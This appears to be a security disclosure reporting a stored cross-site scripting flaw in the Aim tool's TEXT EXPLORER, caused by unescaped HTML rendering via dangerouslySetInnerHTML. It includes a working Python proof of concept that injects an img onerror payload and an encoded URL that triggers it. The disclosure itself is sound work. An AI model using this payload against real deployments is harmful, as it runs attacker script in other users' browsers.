credit:Aftersnows
In the textbox.tsx file, the dangerouslySetInnerHTML function from React is used, which can display the text in this area and potentially cause an XSS attack.
Through analysis, it can be discovered that there are multiple instances of dangerouslySetInnerHTML being used, not just in the previously logged XSS storage vulnerability, but also within the textbox component.
[TEXT_RNDERER_MODES.HTML]: (
<div dangerouslySetInnerHTML={{ __html: text }} />
),
By sending this PoC (Proof of Concept) to the target machine.
from aim import Run,Text
run = Run(repo="aim://127.0.0.1:53800",capture_terminal_logs=False)
poc="<img onerror='alert(\\"Hacked!\\");' src='invalid' />"
run.track(Text(poc), name=poc, step=1, epoch=1,context={ "subset": "train" })
Afterwards, by using the HTML text renderer in the TEXT EXPLORER feature, a stored XSS (Cross-Site Scripting) can be triggered.
https://github.com/user-attachments/assets/9b9f5bb9-91ff-410d-8c0b-6b6ac8719828
A user simply needs to access the TEXT EXPLORER query to trigger the XSS attack.
<http://127.0.0.1:43800/text?query=O-JTdCJTIyZm9ybSUyMjolN0IlMjJzaW1wbGVJbnB1dCUyMjolMjIlMjIsJTIyYWR2YW5jZWRJbnB1dCUyMjolMjJ0ZXh0cy5jb250ZXh0LnN1YnNldCUyMD09JTIwJTVDJTIydHJhaW4lNUMlMjIlMjIsJTIyc2VsZWN0aW9ucyUyMjolNUIlN0IlMjJsYWJlbCUyMjolMjIlM0NpbWclMjBvbmVycm9yPSdhbGVydCglNUMlMjJ4c3MlNUMlMjIpOyclMjBzcmM9J2VtcHR5LnBuZyclMjAvJTNFJTIwc3Vic2V0PSU1QyUyMnRyYWluJTVDJTIyJTIyLCUyMmdyb3VwJTIyOiUyMiUzQ2ltZyUyMG9uZXJyb3I9J2FsZXJ0KCU1QyUyMnhzcyU1QyUyMik7JyUyMHNyYz0nZW1wdHkucG5nJyUyMC8lM0UlMjIsJTIya2V5JTIyOiUyMk8tSlRkQ0pUSXliV1YwY21salRtRnRaU1V5TWpvbE1qSWxNME5wYldjbE1qQnZibVZ5Y205eVBTZGhiR1Z5ZENnbE5VTWxNako0YzNNbE5VTWxNaklwT3ljbE1qQnpjbU05SjJWdGNIUjVMbkJ1WnljbE1qQXZKVE5GSlRJeUxDVXlNbU52Ym5SbGVIUk9ZVzFsSlRJeU9pVXlNaVV5TUhOMVluTmxkRDBsTlVNbE1qSjBjbUZwYmlVMVF5VXlNaVV5TWlVM1JBJTIyLCUyMnZhbHVlJTIyOiU3QiUyMm9wdGlvbl9uYW1lJTIyOiUyMiUzQ2ltZyUyMG9uZXJyb3I9J2FsZXJ0KCU1QyUyMnhzcyU1QyUyMik7JyUyMHNyYz0nZW1wdHkucG5nJyUyMC8lM0UlMjIsJTIyY29udGV4dCUyMjolN0IlMjJzdWJzZXQlMjI6JTIydHJhaW4lMjIlN0QlN0QlN0QlNUQsJTIyYWR2YW5jZWRNb2RlT24lMjI6dHJ1ZSwlMjJpc0luaXRpYWwlMjI6ZmFsc2UlN0QsJTIycmFuZ2VzJTIyOiU3QiUyMmlzQXBwbHlCdXR0b25EaXNhYmxlZCUyMjp0cnVlLCUyMmlzVmFsaWQlMjI6dHJ1ZSwlMjJpc0luaXRpYWwlMjI6ZmFsc2UsJTIycmVjb3JkJTIyOiU3QiUyMmRlbnNpdHklMjI6MSwlMjJzbGljZSUyMjolNUIxLDElNUQlN0QsJTIyaW5kZXglMjI6JTdCJTIyZGVuc2l0eSUyMjoxLCUyMnNsaWNlJTIyOiU1QjAsMCU1RCU3RCU3RCU3RA&vis1-c-textRenderer=O-JTdCJTIydHlwZSUyMjolMjJodG1sJTIyJTdE>
This is a standard stored XSS (Cross-Site Scripting) vulnerability. Once triggered by a user, it can lead to the execution of browser actions.
TEXT EXPLORER is designed for querying and filtering large amounts of text that meet certain criteria. Imagine a normal user wanting to use the TEXT EXPLORER feature to query the content they need, but an attacker injects a large number of XSS payloads into it. The attacker uses different tags (such as name, title, etc., which are all under the attacker's control when sent) for PoC injection. As a result, the user becomes vulnerable to XSS attacks. The impact of this vulnerability is significant.
credit:Aftersnows